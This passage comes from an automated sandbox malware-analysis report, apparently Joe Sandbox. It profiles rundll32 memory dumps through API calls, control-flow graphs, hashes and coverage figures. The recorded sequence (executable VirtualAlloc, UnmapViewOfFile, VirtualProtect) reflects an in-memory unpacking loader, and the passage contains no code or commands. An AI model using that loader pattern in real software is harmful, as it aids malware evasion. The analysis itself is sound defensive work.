                                                                      • Source File: 00000010.00000002.2197095274.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: a8ef30cf9dc0b6c118dad2a37b8a81712d49dcb17153fe9b9ad23c4ea647f355
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: E8B19A75A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB355D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 12f550-12f59b call 12f960 42 12f5aa-12f5da call 12f330 VirtualAlloc 39->42 43 12f59d-12f5a7 call 12f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2197095274.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 386ac353dc2f027dbf529e201855683646225776c1ed6e9d1923fde277413059
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 6A113060D08289EEEF01D7E894097EEBFB55B21708F0440A8E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage: 9.1%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 13
                                                                      Total number of Limit Nodes: 1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2206739849.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2206739849.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage: 9.1%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 13
                                                                      Total number of Limit Nodes: 1

                                                                      Graph

                                                                      execution_graph 1173 1cfed0 1174 1cfeed 1173->1174 1179 1cf550 1174->1179 1176 1cff7c 1182 1cfb30 VirtualAlloc 1176->1182 1178 1cffb3 1180 1cf591 1179->1180 1181 1cf5c4 VirtualAlloc 1180->1181 1181->1176 1183 1cfb8e 1182->1183 1184 1cfc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 1cfc50 1184->1185 1186 1cfd7d 1185->1186 1187 1cfd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 001CFC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001CFC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001CFD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2217174242.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 45f389ec2aa4e51a2fc57f289db33ff4fa75fe6bb965d181c0219365a9862601
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 45B1AAB5A00109DFCB48CF84C590EAEB7B6BF98314F208159E919AB355D735EE82CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 39 1cf550-1cf59b call 1cf960 42 1cf59d-1cf5a7 call 1cf960 39->42 43 1cf5aa-1cf5da call 1cf330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CF5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2217174242.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 27437ec5208aa4086a4bf65c4afb43b2448d1d2896a45ea183c8e927ae75f31f
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: C61133A0D082C9EEEF01D7E88405BEEBFB55B21704F044098E5446A282D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2226022249.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2226022249.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0014FB75
                                                                      • UnmapViewOfFile.KERNEL32(?), ref: 0014FC25
                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0014FC3F
                                                                      • VirtualProtect.KERNEL32(?,?,00000000), ref: 0014FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.2339354576.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 39 14f550-14f59b call 14f960 42 14f59d-14f5a7 call 14f960 39->42 43 14f5aa-14f5da call 14f330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0014F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.2339354576.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions